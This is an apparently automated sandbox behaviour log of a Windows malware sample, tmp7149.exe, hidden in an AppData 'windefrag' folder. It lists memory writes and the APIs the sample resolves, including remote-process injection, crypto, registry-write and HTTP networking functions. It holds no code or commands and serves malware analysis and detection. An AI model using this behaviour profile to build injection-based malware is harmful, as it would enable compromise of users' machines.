| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a0d0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 23 |
|
5 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a0d8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a0e0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 28 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a0e8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 16 |
|
5 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a0f0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a0f8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a100, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a108, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a110, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a118, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a120, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a128, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a130, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a138, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a140, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a148, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a150, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a158, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a160, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a168, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a170, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a178, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a180, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a188, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a190, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a1e0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a1e8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a000, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a008, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a010, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a018, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a020, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a028, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a030, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a038, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a040, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a048, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a050, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a058, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a1d0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a430, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a438, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a1a0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a1a8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a1b0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a1b8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a1c0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a068, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a1f8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a200, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 26 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a208, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a210, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a218, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a220, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a228, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a230, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a238, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a240, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a248, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a250, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a260, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a268, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a270, size = 8 |
|
1 |
Threads
Thread 0x97c
360
11
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = msvcrt.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = __C_specific_handler, ordinal = 0, address_out = 0x20025 |
|
1 | |
| Module | Get Address | function = _XcptFilter, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = _exit, ordinal = 0, address_out = 0x20016 |
|
1 | |
| Module | Get Address | function = _cexit, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = exit, ordinal = 0, address_out = 0x20015 |
|
1 | |
| Module | Get Address | function = _wcmdln, ordinal = 0, address_out = 0x20018 |
|
1 | |
| Module | Get Address | function = _initterm, ordinal = 0, address_out = 0x2001a |
|
1 | |
| Module | Get Address | function = _amsg_exit, ordinal = 0, address_out = 0x2001b |
|
1 | |
| Module | Get Address | function = _localtime64, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = _time64, ordinal = 0, address_out = 0x20018 |
|
1 | |
| Module | Get Address | function = ??2@YAPEAX_K@Z, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = __setusermatherr, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = _commode, ordinal = 0, address_out = 0x20019 |
|
1 | |
| Module | Get Address | function = _fmode, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = __set_app_type, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = ?terminate@@YAXXZ, ordinal = 0, address_out = 0x20022 |
|
1 | |
| Module | Get Address | function = sprintf, ordinal = 0, address_out = 0x20018 |
|
1 | |
| Module | Get Address | function = sscanf, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = free, ordinal = 0, address_out = 0x20015 |
|
1 | |
| Module | Get Address | function = malloc, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = strtok, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = realloc, ordinal = 0, address_out = 0x20018 |
|
1 | |
| Module | Get Address | function = _CxxThrowException, ordinal = 0, address_out = 0x20023 |
|
1 | |
| Module | Get Address | function = ??1type_info@@UEAA@XZ, ordinal = 0, address_out = 0x20026 |
|
1 | |
| Module | Get Address | function = __wgetmainargs, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = _vsnprintf, ordinal = 0, address_out = 0x2001b |
|
1 | |
| Module | Get Address | function = atoi, ordinal = 0, address_out = 0x20015 |
|
1 | |
| Module | Get Address | function = strstr, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = _wtoi, ordinal = 0, address_out = 0x20016 |
|
1 | |
| Module | Get Address | function = rand, ordinal = 0, address_out = 0x20015 |
|
1 | |
| Module | Get Address | function = tolower, ordinal = 0, address_out = 0x20018 |
|
1 | |
| Module | Get Address | function = memcmp, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = srand, ordinal = 0, address_out = 0x20016 |
|
1 | |
| Module | Get Address | function = _itow, ordinal = 0, address_out = 0x20016 |
|
1 | |
| Module | Get Address | function = _vsnwprintf, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = ??3@YAXPEAX@Z, ordinal = 0, address_out = 0x2001e |
|
1 | |
| Module | Get Address | function = memset, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = wcsftime, ordinal = 0, address_out = 0x20019 |
|
1 | |
| Module | Get Address | function = ??_V@YAXPEAX@Z, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = memcpy, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = SystemTimeToFileTime, ordinal = 0, address_out = 0x20025 |
|
1 | |
| Module | Get Address | function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0x20028 |
|
1 | |
| Module | Get Address | function = GetCurrentProcessId, ordinal = 0, address_out = 0x20024 |
|
1 | |
| Module | Get Address | function = GetCurrentThreadId, ordinal = 0, address_out = 0x20023 |
|
1 | |
| Module | Get Address | function = GetTickCount, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = QueryPerformanceCounter, ordinal = 0, address_out = 0x20028 |
|
1 | |
| Module | Get Address | function = LocalFree, ordinal = 0, address_out = 0x2001a |
|
1 | |
| Module | Get Address | function = TerminateProcess, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = GetCurrentProcess, ordinal = 0, address_out = 0x20022 |
|
1 | |
| Module | Get Address | function = GetModuleHandleW, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = UnhandledExceptionFilter, ordinal = 0, address_out = 0x20029 |
|
1 | |
| Module | Get Address | function = RtlVirtualUnwind, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = RtlLookupFunctionEntry, ordinal = 0, address_out = 0x20027 |
|
1 | |
| Module | Get Address | function = RtlCaptureContext, ordinal = 0, address_out = 0x20022 |
|
1 | |
| Module | Get Address | function = SetUnhandledExceptionFilter, ordinal = 0, address_out = 0x2002c |
|
1 | |
| Module | Get Address | function = GetStartupInfoW, ordinal = 0, address_out = 0x20020 |
|
1 | |
| Module | Get Address | function = CloseHandle, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = WriteFile, ordinal = 0, address_out = 0x2001a |
|
1 | |
| Module | Get Address | function = CreateFileA, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = WaitForSingleObject, ordinal = 0, address_out = 0x20024 |
|
1 | |
| Module | Get Address | function = CreateProcessA, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = DeleteFileA, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = GetTempPathA, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = GetModuleFileNameW, ordinal = 0, address_out = 0x20023 |
|
1 | |
| Module | Get Address | function = GetSystemDirectoryW, ordinal = 0, address_out = 0x20024 |
|
1 | |
| Module | Get Address | function = Sleep, ordinal = 0, address_out = 0x20016 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = LoadLibraryW, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = GetLastError, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = GetVolumeInformationW, ordinal = 0, address_out = 0x20026 |
|
1 | |
| Module | Get Address | function = GetWindowsDirectoryW, ordinal = 0, address_out = 0x20025 |
|
1 | |
| Module | Get Address | function = CreateProcessW, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = lstrlenW, ordinal = 0, address_out = 0x20019 |
|
1 | |
| Module | Get Address | function = GetFullPathNameW, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = GetSystemTime, ordinal = 0, address_out = 0x2001e |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = wsprintfW, ordinal = 0, address_out = 0x2001a |
|
1 | |
| Module | Get Address | function = wsprintfA, ordinal = 0, address_out = 0x2001a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = RegQueryValueExW, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = RegOpenKeyW, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = RegSetValueExW, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = CryptDecrypt, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = CryptSetKeyParam, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = CryptDestroyKey, ordinal = 0, address_out = 0x20020 |
|
1 | |
| Module | Get Address | function = CryptEncrypt, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = CryptImportKey, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = CryptAcquireContextA, ordinal = 0, address_out = 0x20025 |
|
1 | |
| Module | Get Address | function = CryptReleaseContext, ordinal = 0, address_out = 0x20024 |
|
1 | |
| Module | Get Address | function = RegCreateKeyExW, ordinal = 0, address_out = 0x20020 |
|
1 | |
| Module | Get Address | function = RegCloseKey, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = SHGetFolderPathW, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = CoInitializeEx, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = CoInitializeSecurity, ordinal = 0, address_out = 0x20025 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 2, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 6, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 8, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 9, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 4, address_out = 0x20000 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = CryptStringToBinaryA, ordinal = 0, address_out = 0x20025 |
|
1 | |
| Module | Load | module_name = WINHTTP.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = WinHttpQueryHeaders, ordinal = 0, address_out = 0x20024 |
|
1 | |
| Module | Get Address | function = WinHttpCloseHandle, ordinal = 0, address_out = 0x20023 |
|
1 | |
| Module | Get Address | function = WinHttpQueryDataAvailable, ordinal = 0, address_out = 0x2002a |
|
1 | |
| Module | Get Address | function = WinHttpOpen, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = WinHttpReceiveResponse, ordinal = 0, address_out = 0x20027 |
|
1 | |
| Module | Get Address | function = WinHttpSendRequest, ordinal = 0, address_out = 0x20023 |
|
1 | |
| Module | Get Address | function = WinHttpSetOption, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = WinHttpOpenRequest, ordinal = 0, address_out = 0x20023 |
|
1 | |
| Module | Get Address | function = WinHttpSetTimeouts, ordinal = 0, address_out = 0x20023 |
|
1 | |
| Module | Get Address | function = WinHttpConnect, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = WinHttpReadData, ordinal = 0, address_out = 0x20020 |
|
1 | |
| Module | Get Address | function = WinHttpCrackUrl, ordinal = 0, address_out = 0x20020 |
|
1 | |
| Module | Load | module_name = WS2_32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 116, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = getaddrinfo, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = freeaddrinfo, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = 0, ordinal = 57, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 9, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 8, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 12, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 5, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 19, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 3, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 23, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 16, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 21, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 11, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 4, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 115, address_out = 0x20000 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-06 22:29:38 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 287884 |
|
1 | |
| Module | Get Handle | module_name = private_0x0000000140000000, base_address = 0x140000000 |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateThread, address_out = 0x77b36580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameW, address_out = 0x77b2d130 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpW, address_out = 0x77b3d9c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrlenW, address_out = 0x77b33ec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetFullPathNameW, address_out = 0x77b376e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FindFirstFileW, address_out = 0x77b3bd80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FindResourceW, address_out = 0x77b39b50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeLibrary, address_out = 0x77b36620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LoadResource, address_out = 0x77b398c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleW, address_out = 0x77b43730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetFileTime, address_out = 0x77b33880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcpynW, address_out = 0x77b6bab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x77b42dd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FindClose, address_out = 0x77b3bd60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LockResource, address_out = 0x77b28720 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetSystemInfo, address_out = 0x77b36f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FindNextFileW, address_out = 0x77b31910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetFileTime, address_out = 0x77b24f80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x77b37070 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x77b81230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetFileAttributesW, address_out = 0x77b337a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateDirectoryW, address_out = 0x77b2ad70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WaitForSingleObject, address_out = 0x77b42b20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SignalObjectAndWait, address_out = 0x77b92c90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetEvent, address_out = 0x77b33f00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateRemoteThread, address_out = 0x77b6c4f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = OpenProcess, address_out = 0x77b3cad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualFreeEx, address_out = 0x77b6bb90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ReadProcessMemory, address_out = 0x77b6bdc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = TerminateProcess, address_out = 0x77b6bca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualProtectEx, address_out = 0x77b6bb70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualAllocEx, address_out = 0x77b6bbd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ResetEvent, address_out = 0x77b2d9a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetExitCodeThread, address_out = 0x77b31130 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateEventW, address_out = 0x77b35290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = DuplicateHandle, address_out = 0x77b35d10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WriteProcessMemory, address_out = 0x77b6bad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ResumeThread, address_out = 0x77b313a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateMutexW, address_out = 0x77b313c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LocalFree, address_out = 0x77b347a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcpyW, address_out = 0x77b6e0d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = DeleteFileW, address_out = 0x77b2ad90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetCurrentDirectoryW, address_out = 0x77b3cab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = EnterCriticalSection, address_out = 0x77c92fc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = MoveFileW, address_out = 0x77baf7f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTempPathW, address_out = 0x77b82040 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetStartupInfoW, address_out = 0x77b38070 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameW, address_out = 0x77b37700 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetFileAttributesW, address_out = 0x77b3bdd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77c93000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x77b42b70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x77b364e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTickCount, address_out = 0x77b42b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = MoveFileExW, address_out = 0x77b23060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateProcessW, address_out = 0x77b41bb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTempFileNameW, address_out = 0x77b6c030 |
|
1 | |
